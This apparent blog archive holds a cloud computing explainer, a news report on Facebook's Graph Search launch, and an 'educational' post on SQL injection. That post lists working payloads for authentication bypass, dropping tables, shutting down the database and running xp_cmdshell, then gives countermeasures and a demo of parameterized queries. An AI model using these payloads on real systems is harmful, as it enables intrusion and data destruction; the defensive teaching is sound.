Monday 30 September 2013

CLOUD COMPUTING!!!

If you pick up any tech magazine or visit IT-related websites and blogs, I'm sure you'll see talk about cloud computing. But the one problem with cloud computing is that not everyone agrees on what it is. If you ask ten different IT professionals what cloud computing is, you'll surely get ten different answers! Typical answers you get are:
  • widely distributed
  • network based
  • storage
  • computation
  • utility computing
  • HaaS
  • PaaS
  • SaaS
Some customer-oriented definitions:
  • Anytime
  • anywhere
  • with any device
  • accessing any services

When you store your photos online instead of on your home computer, or use webmail or a social networking site, you are actually using a "cloud" service. If you are an organization and you want to use, for example, an online invoicing service instead of updating the in-house one you have been using for many years, that online invoicing service is a "cloud computing" service.
Cloud computing refers to the delivery of computing resources over the internet. Instead of keeping data on your own hard drive or updating applications for your needs, you use a service at another location to store your information or use its applications. Doing so may give rise to certain privacy implications. Cloud services allow individuals and businesses to use software and hardware that are managed by third parties at remote locations. Examples of cloud services include online file storage, social networking sites, email, and online business applications. The cloud computing model allows access to information and computer resources from anywhere that a network connection is available. Cloud computing provides a shared pool of resources, including data storage space, networks, computer processing power, and specialized corporate and user applications.

Key Characteristics:
  • Universal access
  • Scalable services
  • Infrastructure managing the scaling, not applications.
  • Elasticity: Expenses only incurred when they are needed.
  • New Application Service Models
  • XaaS = X as a Service
  • Pay-as-you-go


Monday 23 September 2013

SQL Injection attacks and Countermeasures


(for educational purpose only)

Most modern web applications rely on dynamic content to achieve the appeal of traditional desktop windowing programs. This dynamism is typically achieved by retrieving updated data from a database. One of the more popular platforms for web datastores is SQL, and many web applications are based entirely on front-end scripts that simply query a SQL database, either on the web server itself or a separate back-end system. One of the most insidious attacks on a web application involves hijacking the queries used by the front-end scripts themselves to attain control of the application or its data. One of the most efficient mechanisms for achieving this is a technique called SQL injection.
SQL injection refers to inputting raw Transact SQL queries into an application to perform an unexpected action. Often, existing queries are simply edited to achieve the same results—Transact SQL is easily manipulated by the placement of even a single character in a judiciously chosen spot, causing the entire query to behave in quite malicious ways. Some of the characters commonly used for such input validation attacks include the backtick (`), the double dash (--) and the semicolon (;), all of which have special meaning in Transact SQL.
What sorts of things can a crafty hacker do with a usurped SQL query? Well, for starters, they could potentially access unauthorized data. With even sneakier techniques, they can bypass authentication or even gain complete control over the web server or back-end SQL system.

Example of SQL Injections
To see whether the application is vulnerable to SQL injections, type any of the following in the form fields.

Bypassing Authentication
To authenticate without any credentials:
Username: 'OR''='
Password: 'OR''='
To authenticate with just the username:
Username: admin'--
To authenticate as the first user in the "users" table:
Username: ' or 1=1--
To authenticate as a fictional user:
Username: ' union select 1,'users','passwd'1--

Causing Destruction
To drop a dbase table:
Username: ';drop table users--
To shut down the dbase remotely:
Username: aaaaaaaaaaaaaaa'
Password: ';shutdown--

Executing Function Calls and Stored Procedures
Executing xp_cmdshell to get a directory listing:
http://localhost/script?0';EXEC+master..xp_cmdshell+'dir';--
Executing xp_servicecontrol to manipulate services:
http://localhost/script?0';EXEC+master..xp_servicecontrol+'start','server';--
Not all the syntax shown here works on every proprietary dbase implementation. The following information indicates whether some of the techniques outlined above will work on certain dbase platforms:

Database-Specific Information:

Technique                  | MySQL                   | Oracle          | DB2 | PostgreSQL | MS SQL
UNION possible             | Y                       | Y               | Y   | Y          | Y
Subselects possible        | N                       | Y               | Y   | Y          | Y
Multiple statements        | N (mostly)              | N               | N   | Y          | Y
Default stored procedures  | -                       | Many (utl_file) | -   | -          | Many (xp_cmdshell)
Other comments             | Supports "INTO OUTFILE" | -               | -   | -          | -


SQL Injection Countermeasures:

Here is an extensive but not complete list of methods used to prevent SQL injection:
  • Perform string input validation on any input from the client. Follow the common programming mantra of “constrain, reject and sanitize” – that is, constrain your input where possible (for example, only allow numeric formats for a ZIP code field), reject input that doesn’t fit the pattern, and sanitize where constraint is not practical. When sanitizing, consider validating data type, length, range and format correctness. See the Regular Expression Library at http://www.regexlib.com for a great sample of regular expressions for validating inputs.
  • Replace direct SQL statements with stored procedures, prepared statements, or ADO command objects. If you can’t use stored procs, use parameterized queries.
  • Implement default error handling. This would include using a general error message for all errors.
  • Lock down ODBC. Disable messaging to clients. Don’t let regular SQL statements through. This ensures that no client, not just the web application, can execute arbitrary SQL.
  • Lock down the dbase server configuration. Specify users, roles and permissions. Implement triggers at the RDBMS layer. This way, even if someone can get to the dbase and get arbitrary SQL statements to run, they won’t be able to do anything they’re not supposed to.
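As an added example (not part of the original post), the authentication-bypass inputs listed above are run against a login query built by string concatenation and against the same query written with parameters, followed by a constrain-and-reject check for a ZIP code field as the countermeasures list recommends. The users table and its single account are constructed sample data, and SQLite stands in for the Transact-SQL back end.

```python
import re
import sqlite3

# Constructed sample table: one account, values invented for this demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, passwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn

def login_vulnerable(conn, username, password):
    """Query built by string concatenation: a quote in the input closes
    the literal, so the rest of the input is parsed as SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND passwd = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Same query with placeholders: the driver binds the values as data,
    so a quote or '--' in the input never changes the query's structure."""
    sql = "SELECT username FROM users WHERE username = ? AND passwd = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# "Constrain, reject": a ZIP field accepts only 5 digits (optionally +4);
# anything else, including an injection string, is rejected outright.
ZIP_RE = re.compile(r"\d{5}(-\d{4})?")

def constrain_zip(value):
    return ZIP_RE.fullmatch(value) is not None

if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "s3cret"), ("' OR ''='", "' OR ''='"),
                     ("admin'--", "wrong")]:
        print(repr(user), "-> concatenated:", login_vulnerable(db, user, pw),
              "| parameterized:", login_parameterized(db, user, pw))
    print(constrain_zip("12345"), constrain_zip("12345' OR ''='"))
```

With the concatenated query both injected inputs log in as admin; with the parameterized query only the real credentials do.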

Wednesday 16 January 2013

Facebook Graph Search


Mark Zuckerberg introduces Facebook's new friends-based search engine at the company's headquarters in California. Link to video: Mark Zuckerberg on Facebook's new search engine
Facebook has unveiled a new feature to allow users to sift through pictures, posts and messages in a way that the company's founder and chief executive, Mark Zuckerberg, claimed could transform how people use the social network.
Unveiling the tool, Graph Search, at its first major product launch since the company's IPO last May, Zuckerberg described it as the site's "third pillar", after Timeline and News Feed.
"Graph Search is a completely new way for people to get information on Facebook," he told a packed press conference at the company's headquarters in Menlo Park on Tuesday.
The function will initially let users search four categories – people, places, photos, interests – and gradually expand to cover all content, Zuckerberg said.
"Graph Search is a really big project. Eventually... we want to index all the posts and all of the content on Facebook. I thought it couldn't be done. This is just some really neat stuff. This is one of the coolest things we've done in a while."
A limited rollout began immediately, with Zuckerberg stressing that Graph Search is a "beta" product which will expand slowly and be built on over the coming years, evolving in response to how people used it.
"Graph Search is designed to take a precise query and return to you the answer," he said, "not links to other places that might take you to the answer."
Lars Rasmussen, a former Google executive who is now one of Facebook's top engineers, cited as an example a search for a spicy meal in San Francisco. A search for "restaurants liked by my friends from India" revealed a long list. Narrowing that to "Indian restaurants liked by my friends from India" yielded another list. Then he searched for restaurants in San Francisco liked by Culinary Institute of America graduates.
In cases where Graph Search comes up blank – which is likely to be a frequent occurrence in its infancy – the service defaults to the web search engine Bing, which is run by Google's rival Microsoft.
Industry analysts have long waited for Facebook to develop new ways to tap its lucrative mountains of data. Its stock rose last week, in anticipation that the announcement would involve a search engine. Zuckerberg said talks with Google over a possible collaboration had broken down over Facebook's insistence on greater privacy protection. He said the new service would not reveal additional information but instead collate and organise in new ways information to which users already had access.
He and fellow executives showed, however, how users could find a wealth of previously overlooked photos and posts and "likes".
"I want to invite friends over for Game of Thrones," he said, "but who among my friends likes Game of Thrones? Graph Search tells me."
Graph Search also enables the user to search, for instance, for "photos of my friends taken in national parks" or "photos of my friends taken before 1990". The latter revealed a gallery of Facebook employees as babies, prompting guffaws from assembled staff.
Tom Stocky, another Google import, showed what appeared to be a market researchers' dream tool: the new feature allows users to ask, for instance, what TV shows are most liked by doctors (Grey's Anatomy, House, The Doctors), or software engineers (Big Bang Theory).
A search for music liked by those who like Mitt Romney revealed Johnny Cash. Obama-likers liked Michael Jackson.
The tool could help Facebook wean users away from Google, LinkedIn and dating sites, but Zuckerberg said the priority for now was improving existing customers' experience, with business applications to be considered later. There is no timetable for when Graph Search will be available on mobile.
"This is a really big project," Zuckerberg said. "It will take years and years to map the whole index of the graph."
His downplaying of immediate revenue sources dented markets' exuberance: shares dipped 1.5% to $30.46 immediately following the announcement.
Brian Blau, who tracks social media for the tech research firm Gartner, said the service offered a brand new way for users to experience Facebook. Confined to Facebook's eco-system, the service was not an immediate threat to Google but would gradually increase in importance, he said. "In the future, you know Facebook will figure out how to monetize this. It's going to change the way people think about search."
The respected news site TechCrunch gave Graph Search a thumbs-up and said investors who considered the announcement an anti-climax – prompting a dip in Facebook's share price – had missed the point.
"What's interesting is that Facebook does not shy away from introducing radical changes to its products," the site said. "As always, it focuses on what's best for the user and will stand behind an innovation if it believes that it will improve the user experience."
Investors, in contrast, liked conservative choices, security and stability, said TechCrunch. "That's why they should adapt to Facebook's way of doing things if they want to understand the company's long-term perspective, because Graph Search is clearly an important move for Facebook."

You can join the waiting list at https://www.facebook.com/about/graphsearch